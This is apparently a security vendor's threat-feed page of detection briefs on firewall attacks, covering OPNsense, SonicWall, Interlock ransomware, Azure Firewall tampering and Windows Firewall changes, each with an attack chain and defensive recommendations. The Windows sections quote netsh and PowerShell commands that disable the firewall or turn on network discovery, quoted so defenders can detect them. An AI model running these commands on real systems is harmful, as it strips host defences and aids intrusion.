Firewall — CraftedSignal Threat Feed

OPNsense Multiple Vulnerabilities Leading to Remote Code Execution

hello@craftedsignal.io — Mon, 04 May 2026 11:09:07 +0000

Multiple unspecified vulnerabilities in OPNsense allow a remote, anonymous attacker to bypass security restrictions and achieve arbitrary code execution. The vulnerabilities stem from inadequate input validation and insufficient privilege checks within the OPNsense firewall software. While the specific vulnerable components are not detailed in the advisory, successful exploitation would grant an attacker complete control over the affected OPNsense instance. This can lead to a complete breach of the network perimeter, allowing the attacker to pivot to internal systems, intercept network traffic, or disrupt network services. Given the critical role of OPNsense as a network gateway, organizations using this software should prioritize detection and mitigation efforts.

Attack Chain

The attacker identifies a vulnerable OPNsense instance accessible over the network.
The attacker crafts a malicious request targeting a specific, undisclosed vulnerable endpoint. This request exploits a flaw in input validation or authentication.
The vulnerable OPNsense component processes the malicious request without proper sanitization or authorization checks.
The injected payload bypasses security restrictions, potentially exploiting a command injection or similar vulnerability.
The injected payload executes arbitrary code on the OPNsense system, gaining initial access.
The attacker leverages the initial foothold to escalate privileges within the OPNsense system.
The attacker establishes persistence, ensuring continued access even after system reboots or security updates.
The attacker pivots to other systems within the network, using the compromised OPNsense instance as a launchpad for further attacks, or exfiltrates sensitive data.

Impact

Successful exploitation of these vulnerabilities allows a remote attacker to execute arbitrary code on the OPNsense firewall. This gives the attacker full control of the firewall, allowing them to intercept network traffic, modify firewall rules, and potentially pivot to internal networks. The impact is a complete compromise of the network perimeter, potentially affecting all systems and data behind the firewall. The number of affected organizations is currently unknown.

Recommendation

Monitor OPNsense webserver logs for suspicious POST requests to unusual or sensitive endpoints, using a webserver category Sigma rule (see example below).
Implement network intrusion detection systems (NIDS) rules to detect exploitation attempts against OPNsense services.
While specific CVEs are unavailable, stay informed about OPNsense security updates and apply them immediately upon release.

Multiple Vulnerabilities in SonicWall Products Allow for DoS and Security Policy Bypass

hello@craftedsignal.io — Thu, 30 Apr 2026 00:00:00 +0000

On April 30, 2026, CERT-FR published an advisory regarding multiple vulnerabilities affecting various SonicWall firewall products. These vulnerabilities, detailed in SonicWall security bulletin SNWLID-2026-0004, could allow an unauthenticated remote attacker to trigger a denial-of-service condition or bypass security policies. The affected products include a wide range of SonicWall firewalls across multiple generations (Gen 6, Gen 7, and Gen 8), as well as NSv virtual firewalls deployed in ESX, KVM, Hyper-V, AWS, and Azure environments. Successful exploitation of these vulnerabilities could lead to significant disruption of network services and a compromise of security controls.

Attack Chain

The attacker identifies a vulnerable SonicWall firewall exposed to the internet.
The attacker sends a specially crafted network packet to the firewall. This packet exploits one of the vulnerabilities (CVE-2026-0204, CVE-2026-0205, or CVE-2026-0206).
If the attacker exploits a DoS vulnerability, the firewall’s CPU and memory resources are consumed, leading to a denial-of-service condition.
Legitimate network traffic is disrupted due to the firewall’s degraded performance or complete failure.
If the attacker exploits a security policy bypass vulnerability, they can potentially gain unauthorized access to internal network resources.
The attacker may then attempt to move laterally within the network, exploiting additional vulnerabilities in other systems.

Impact

Successful exploitation of these vulnerabilities could lead to a complete denial of service, disrupting network connectivity for affected organizations. A security policy bypass could also allow unauthorized access to sensitive internal resources. The number of potential victims is significant, given the widespread use of SonicWall firewalls across various industries.

Recommendation

Apply the patches outlined in SonicWall security bulletin SNWLID-2026-0004 to all affected SonicWall firewalls immediately.
Monitor network traffic for suspicious activity targeting SonicWall firewalls.
Deploy the Sigma rules below to your SIEM to detect potential exploitation attempts in your environment.
Review and enforce strict network segmentation policies to limit the impact of a potential security policy bypass.

Interlock Ransomware Campaign Targeting Enterprise Firewalls

hello@craftedsignal.io — Thu, 19 Mar 2026 05:33:30 +0000

The Interlock ransomware campaign specifically targets enterprise firewalls. The campaign’s objective is to encrypt sensitive data residing on or accessible through these firewalls, rendering systems inoperable and creating significant business disruption. While specific details about the initial discovery and scope of the campaign remain limited, its focus on firewalls suggests a targeted approach aimed at organizations heavily reliant on these devices for network security and perimeter defense. The lack of specific details about delivery mechanisms and exploited vulnerabilities underscores the need for proactive threat hunting and vulnerability management to detect and mitigate potential Interlock ransomware infections.

Attack Chain

Initial Access: The attacker gains initial access to the targeted network, potentially through exploiting vulnerabilities in the firewall’s management interface or VPN services.
Firewall Compromise: The attacker exploits the initial access to compromise the firewall device. This may involve exploiting known vulnerabilities or using stolen credentials.
Lateral Movement: The attacker uses the compromised firewall as a pivot point to move laterally within the internal network. Tools like ssh or PsExec may be used.
Discovery: The attacker performs reconnaissance to identify valuable data stores accessible through the firewall. This may involve scanning network shares or querying databases.
Privilege Escalation: The attacker attempts to escalate privileges to gain administrative access to critical systems. This could involve exploiting vulnerabilities or using credential harvesting techniques.
Data Encryption: The attacker deploys the Interlock ransomware payload to encrypt sensitive data on systems accessible via the firewall.
Ransom Demand: After encryption, the attacker delivers a ransom note demanding payment for decryption keys.
Exfiltration (Possible): Depending on the attacker’s goals, data exfiltration may occur prior to encryption.

Impact

A successful Interlock ransomware attack can lead to significant data loss, business disruption, and financial damage. Organizations can suffer reputational damage and legal repercussions due to data breaches. The targeted nature of the attack suggests a focus on organizations where firewall compromise would have a widespread impact, potentially affecting hundreds or thousands of users or customers.

Recommendation

Enable enhanced logging on all enterprise firewalls to capture detailed activity, including login attempts, configuration changes, and network traffic. This enhances the effectiveness of the detection rules below.
Implement multi-factor authentication (MFA) for all firewall administrative access to mitigate the risk of credential theft.
Regularly patch and update firewall firmware to address known vulnerabilities.
Deploy the Sigma rules provided in this brief to your SIEM and tune for your environment.

Azure Firewall Rule Collection Modification or Deletion

hello@craftedsignal.io — Wed, 31 Jan 2024 12:00:00 +0000

The modification or deletion of Azure Firewall rule collections (Application, NAT, and Network) can indicate malicious activity within an Azure environment. Threat actors may target these rules to bypass security controls, allowing unauthorized network traffic, enabling data exfiltration, or facilitating lateral movement. Monitoring these changes is crucial for maintaining the integrity of network security policies and detecting potential breaches. This activity directly impacts an organization’s ability to enforce its security posture, potentially exposing sensitive resources to unauthorized access.

Attack Chain

The attacker gains initial access to the Azure environment, potentially through compromised credentials or a vulnerability in an application.
The attacker enumerates existing Azure Firewall resources to identify rule collections (Application, NAT, and Network) that can be modified or deleted.
The attacker uses valid Azure credentials or exploits a misconfiguration to authenticate to the Azure Resource Manager API.
The attacker crafts a malicious request to modify the target rule collection, potentially altering allowed ports, IP addresses, or protocols.
Alternatively, the attacker crafts a request to delete an entire rule collection, effectively disabling its associated security controls.
The attacker sends the request to the Azure Resource Manager API, executing the change to the firewall configuration.
The modified or deleted rule collection now allows unauthorized traffic to bypass the firewall, potentially enabling lateral movement or data exfiltration.
The attacker exploits the newly opened network paths to achieve their final objective, such as deploying ransomware or accessing sensitive data.

Impact

Successful modification or deletion of Azure Firewall rule collections can have significant consequences. Unauthorized traffic could bypass security controls, enabling data exfiltration, lateral movement, or the deployment of malware. This could lead to data breaches, service disruptions, and financial losses. The impact depends on the scope of the modified or deleted rule collection and the resources it protects.

Recommendation

Deploy the Sigma rule “Azure Firewall Rule Collection Modified or Deleted” to your SIEM and tune for your environment to detect unauthorized changes to firewall configurations.
Review Azure Activity Logs for any events matching the operationName values specified in the Sigma rule to identify suspicious activity.
Implement multi-factor authentication (MFA) for all Azure accounts, especially those with permissions to manage firewall resources, to reduce the risk of credential compromise.
Regularly audit Azure role-based access control (RBAC) assignments to ensure the principle of least privilege is followed and that only authorized users have permissions to modify firewall configurations.

Azure Firewall Modification or Deletion Detected

hello@craftedsignal.io — Wed, 03 Jan 2024 18:30:00 +0000

This alert identifies potentially malicious modifications or deletions of Azure firewalls. Azure firewalls are critical components for network security, controlling inbound and outbound traffic based on defined rules. An attacker who gains sufficient privileges within an Azure environment may attempt to disable or modify these firewalls to facilitate lateral movement, data exfiltration, or other malicious activities. This activity is particularly concerning as it represents a direct attempt to weaken the victim’s security posture. The activity is detected via Azure Activity Logs. While legitimate administrative actions can trigger this alert, any unexpected or unauthorized changes to firewall configurations should be investigated promptly.

Attack Chain

Attacker gains initial access to an Azure environment, possibly through compromised credentials or exploiting a vulnerability in an application.
Attacker escalates privileges within the Azure subscription to gain permissions to manage network resources, including firewalls.
Attacker identifies the Azure firewalls in the target environment using Azure Resource Manager APIs or the Azure portal.
Attacker modifies firewall rules to allow unauthorized traffic, such as opening ports for command and control communication or disabling security rules. This is achieved via the MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE operation.
Alternatively, the attacker deletes the Azure firewall using the MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE operation, effectively removing network protections.
Attacker validates that their changes have been successfully applied by testing network connectivity or by reviewing the firewall configuration.
Attacker performs malicious activities such as lateral movement, data exfiltration, or deploying additional resources without firewall restrictions.

Impact

Successful modification or deletion of Azure firewalls can have severe consequences. An attacker can bypass network security controls, leading to data breaches, unauthorized access to sensitive resources, and the potential for widespread disruption. This can result in financial losses, reputational damage, and regulatory penalties.

Recommendation

Deploy the provided Sigma rule to your SIEM to detect unauthorized firewall modifications or deletions in Azure Activity Logs.
Investigate any alerts triggered by the Sigma rule, focusing on unfamiliar user identities and user agents.
Review Azure RBAC roles and permissions to ensure the principle of least privilege is enforced, limiting the ability of users and service principals to modify or delete firewalls.
Monitor Azure Activity Logs for other suspicious activities, such as unusual resource deployments or changes to security settings.

Windows Firewall Disabled via Netsh

hello@craftedsignal.io — Wed, 03 Jan 2024 14:30:00 +0000

Attackers commonly use the netsh.exe utility, a command-line scripting tool, to manage network configurations. Abusers leverage netsh.exe to disable or modify Windows Firewall rules, a built-in host-based firewall. This manipulation weakens the system’s defenses, allowing unauthorized network traffic and enabling lateral movement within the compromised environment. The activity allows for command and control communications and unhindered exploitation of internal resources. Defenders must monitor netsh.exe executions for unexpected firewall modifications.

Attack Chain

Initial Access: An attacker gains initial access to a Windows system through various means such as phishing or exploiting a vulnerability.
Privilege Escalation: The attacker escalates privileges to a level sufficient to modify firewall settings.
Discovery: The attacker uses reconnaissance techniques to identify existing firewall rules.
Defense Evasion: The attacker uses netsh.exe to disable specific firewall rules, using commands like netsh advfirewall firewall set rule name="rule_name" new enable=no.
Defense Evasion: Alternatively, the attacker disables the entire firewall using netsh advfirewall set allprofiles state off.
Lateral Movement: With the firewall weakened, the attacker moves laterally to other systems on the network.
Command and Control: The attacker establishes command and control channels, which may now be unimpeded by firewall rules.
Impact: The attacker achieves their objectives, such as data exfiltration, ransomware deployment, or further compromise of the network.

Impact

Successful disabling of Windows Firewall rules can lead to significant security breaches. Attackers can move laterally within the network, compromise additional systems, and exfiltrate sensitive data. The impact can range from data loss and financial damage to reputational harm and legal consequences. The defense evasion enables attackers to establish persistent command and control channels, maintain a long-term presence within the compromised environment and conduct further malicious activities.

Recommendation

Enable Sysmon process creation logging to monitor netsh.exe executions and related command-line arguments to support detections.
Deploy the Sigma rules in this brief to your SIEM to detect attempts to disable Windows Firewall rules via netsh.exe. Tune the rules for your specific environment.
Investigate any alerts generated by the Sigma rules, focusing on identifying the user account, process execution chain, and the specific firewall rules being modified.
Implement strict access controls to limit the number of users with the privileges necessary to modify firewall settings.
Regularly review and audit firewall configurations to ensure they are properly configured and have not been tampered with.

Windows Netsh Tool Used for Firewall Discovery

hello@craftedsignal.io — Wed, 03 Jan 2024 12:00:00 +0000

This detection focuses on identifying instances where the netsh.exe utility is used to query firewall configurations on a Windows system. While netsh.exe is a legitimate tool for network configuration, adversaries can leverage it to gather information about firewall rules and settings. This information can then be used to plan further attacks, such as bypassing firewall restrictions or identifying vulnerable network services. This activity is typically seen during the reconnaissance phase of an attack. The scope of this detection covers any Windows environment where Endpoint Detection and Response (EDR) logs are available.

Attack Chain

An attacker gains initial access to a compromised system through various means, such as phishing or exploiting a vulnerability.
The attacker executes netsh.exe with specific commands to enumerate firewall rules and configurations (e.g., netsh firewall show state, netsh firewall show config).
The netsh.exe process retrieves the requested firewall information from the Windows operating system.
The collected firewall information is parsed to identify potential weaknesses or misconfigurations.
The attacker uses the gathered information to modify existing firewall rules or create new rules to allow unauthorized access.
The attacker leverages the modified firewall configuration to establish a covert communication channel or to move laterally within the network.
The attacker attempts to exfiltrate sensitive data or deploy ransomware.

Impact

Successful exploitation can lead to unauthorized network access, data exfiltration, or the deployment of ransomware. The enumeration of firewall configurations can provide attackers with valuable insights into the network’s security posture, enabling them to bypass security controls and compromise critical assets. This can result in significant financial losses, reputational damage, and disruption of business operations.

Recommendation

Deploy the Sigma rule Detect Suspicious Netsh Firewall Discovery to your SIEM and tune for your environment to detect netsh.exe executions with firewall discovery commands.
Enable Sysmon process-creation logging (Event ID 1) to capture the necessary command-line details.
Investigate any identified instances of netsh.exe being used to query firewall settings, especially when initiated from unusual processes or user accounts.
Monitor parent-child process relationships to identify suspicious process spawning, as highlighted by the Processes.parent_process_name field.
Review firewall configurations regularly to identify and remediate any misconfigurations or overly permissive rules.

Windows Host Network Discovery Enabled via Netsh

hello@craftedsignal.io — Wed, 03 Jan 2024 12:00:00 +0000

Attackers can leverage the netsh.exe utility to modify Windows Firewall settings, specifically enabling Network Discovery. This setting allows a host to broadcast its presence and services, making it easier for attackers to identify potential targets within the network for lateral movement. The behavior is often a post-exploitation technique to weaken host-based defenses after gaining initial access. The modification uses netsh.exe, a command-line scripting utility for managing network configurations. This activity can be easily scripted and automated, making it a common step in reconnaissance and lateral movement playbooks. Defenders should monitor for unauthorized use of netsh.exe to modify firewall settings.

Attack Chain

Attacker gains initial access to a Windows host.
Attacker executes netsh.exe with elevated privileges.
netsh.exe is used to modify the Windows Firewall configuration.
The specific command executed enables Network Discovery using the netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes syntax.
The firewall rule group “Network Discovery” is modified to allow inbound and outbound traffic.
The compromised host begins sending out broadcast messages, advertising its presence and services on the network.
The attacker uses the information gathered to identify other vulnerable systems on the network.
The attacker moves laterally to other systems based on the discovery information.

Impact

Successful exploitation allows attackers to easily enumerate and identify other vulnerable systems within the network. This can lead to rapid lateral movement, further compromising the environment. The risk is heightened when the compromised host has access to sensitive data or critical systems. There is no specific victim count or sector targeted mentioned in the provided source.

Recommendation

Deploy the Sigma rule “Enable Host Network Discovery via Netsh” to your SIEM to detect the use of netsh.exe to enable network discovery (see rule below).
Enable Windows Firewall logging and monitor for changes to firewall rules, specifically those related to Network Discovery.
Review and restrict the use of netsh.exe to authorized personnel and systems only.

Windows Firewall Disabled via PowerShell

hello@craftedsignal.io — Wed, 03 Jan 2024 12:00:00 +0000

Attackers often attempt to disable or modify system firewalls to evade network restrictions and facilitate lateral movement within a compromised environment. The Windows Firewall, a built-in component, provides host-based traffic filtering. Disabling it allows unrestricted communication, aiding command and control activities and hindering detection efforts. This activity is commonly achieved through PowerShell, leveraging cmdlets like Set-NetFirewallProfile. The rule focuses on detecting the use of this specific cmdlet to disable the Windows Firewall, alerting defenders to potential defense evasion attempts. This technique is valuable to attackers across various attack vectors, especially after initial access has been established.

Attack Chain

Initial Access: An attacker gains initial access through methods such as phishing or exploiting a vulnerability in a network-facing application.
Privilege Escalation (if necessary): The attacker escalates privileges to gain the necessary permissions to modify firewall settings.
PowerShell Execution: The attacker executes PowerShell, either through an interactive session or a script.
Disable Firewall Profile: The attacker uses the Set-NetFirewallProfile cmdlet with parameters such as -Enabled False to disable the firewall for all, public, domain, or private profiles.
Network Reconnaissance: With the firewall disabled, the attacker performs network reconnaissance to identify valuable assets and potential lateral movement paths.
Lateral Movement: The attacker moves laterally to other systems on the network, exploiting trust relationships or vulnerabilities.
Command and Control: The attacker establishes command and control channels to communicate with compromised systems and exfiltrate sensitive data.
Data Exfiltration or Further Exploitation: The attacker exfiltrates sensitive data or continues to exploit the environment based on their objectives.

Impact

Successful disabling of the Windows Firewall can lead to unrestricted lateral movement within a network, allowing attackers to compromise additional systems and exfiltrate sensitive data. This can result in data breaches, financial losses, and reputational damage. While the source does not specify the number of affected organizations, any environment relying on Windows Firewall for network segmentation is at risk.

Recommendation

Deploy the provided Sigma rule to your SIEM to detect the use of Set-NetFirewallProfile with the -Enabled False parameter (see Sigma rule below).
Enable process creation logging on Windows endpoints to capture PowerShell executions (reference the logsource in the Sigma rule).
Investigate any alerts generated by the Sigma rule to determine the legitimacy of the firewall modification activity.
Review and enforce the principle of least privilege to limit the number of users with permissions to modify firewall settings.
Consider implementing additional network segmentation and monitoring controls to detect and prevent lateral movement even if the Windows Firewall is disabled.